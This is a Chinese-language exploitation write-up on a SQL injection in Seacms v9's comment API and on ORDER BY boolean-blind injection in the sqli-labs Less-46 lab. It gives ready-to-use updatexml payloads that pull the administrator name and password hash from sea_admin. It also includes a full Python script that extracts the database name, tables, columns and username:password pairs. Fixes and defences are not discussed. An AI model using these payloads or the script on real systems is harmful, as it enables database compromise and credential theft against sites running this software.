Seacms v9 SQL 注入漏洞分析与利用
1. 漏洞概述
Seacms(海洋 CMS)是一款基于 PHP5.X + MySQL 架构的视频点播系统,被广泛用于影视站点管理。在 Seacms v9 版本中,./comment/api/index.php 存在 SQL 注入漏洞,漏洞参数为 $rlist,可用于执行 SQL 注入攻击。
2. 漏洞成因
由于 Seacms v9 是开源的,我们可以直接查看其源码,发现 rlist[] 参数未经过严格的过滤和预处理,导致攻击者可以构造恶意 SQL 语句,实现数据库查询操作。
3. 数据库结构
Seacms v9 版本使用的数据库默认名称为 seacms,其中管理员信息存储在 sea_admin 表。
- 表名:
sea_admin - 字段:
name(管理员用户名)、password(管理员密码
进行代码分析后找到注点,进行尝试注入
payload:
http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20updatexml%20(1,concat_ws(0x20,0x5c,(select%20name%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`
tips:在进行注入时,sea_comment表中一定得先有数据,否则将无法成功注入!!!!
插入数据:
INSERT INTO sea_comment (
uid, v_id, typeid, username, ip, ischeck, dtime, msg,
m_type, reply, agree, anti, pic, vote
) VALUES
(123, 456, 1, 'user1', '192.168.1.2', 1, UNIX_TIMESTAMP(), 'Nice video!', 0, 1, 5, 0, '', 3),
(124, 457, 2, 'user2', '192.168.1.3', 0, UNIX_TIMESTAMP(), 'Great content!', 0, 0, 8, 1, '', 2);
管理员用户密码注入:
payload:
http://127.0.0.1/upload/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20updatexml%20(1,concat_ws(0x20,0x5c,(select%20password%20from%23%0asea_admin%20limit%200,1)),1),%20@`%27`
最后由md5解密得管理员账号密码为:admin
二,order by +布尔盲注
由源码可得是通过sort传入的字段进行排序,于是用sort=if(表达式,id,username)的方式注入,通过BS爬虫爬取表格中的username下一格的值看是否等于Dumb来判断表达式的真假,可以使用二分法加快注入速度
代码如下:
import requests
from bs4 import BeautifulSoup
def get_username(response_text):
soup = BeautifulSoup(response_text, 'html.parser')
username = soup.select_one('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
return username.text if username else ''
def boolean_sqli_exploit(payload_template):
result = ''
i = 1
while True:
left, right = 32, 127
while left < right:
mid = (left + right) // 2
url = payload_template.format(index=i, char_value=mid)
resp = requests.get(url)
if get_username(resp.text) == 'Dumb':
left = mid + 1
else:
right = mid
if left == 32:
break
result += chr(left)
i += 1
print(result)
return result
def inject_database():
payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr(database(),{index},1))>{char_value},id,username) -- "
return boolean_sqli_exploit(payload)
def inject_tables():
payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1))>{char_value},id,username) -- "
return boolean_sqli_exploit(payload)
def inject_columns():
payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{index},1))>{char_value},id,username) -- "
return boolean_sqli_exploit(payload)
def inject_data():
payload = "http://127.0.0.1/sqlilabs/Less-46/index.php?sort=if(ascii(substr((select group_concat(username,':',password) from users),{index},1))>{char_value},id,username) -- "
return boolean_sqli_exploit(payload)
if __name__ == '__main__':
# inject_database()
# inject_tables()
# inject_columns()
inject_data()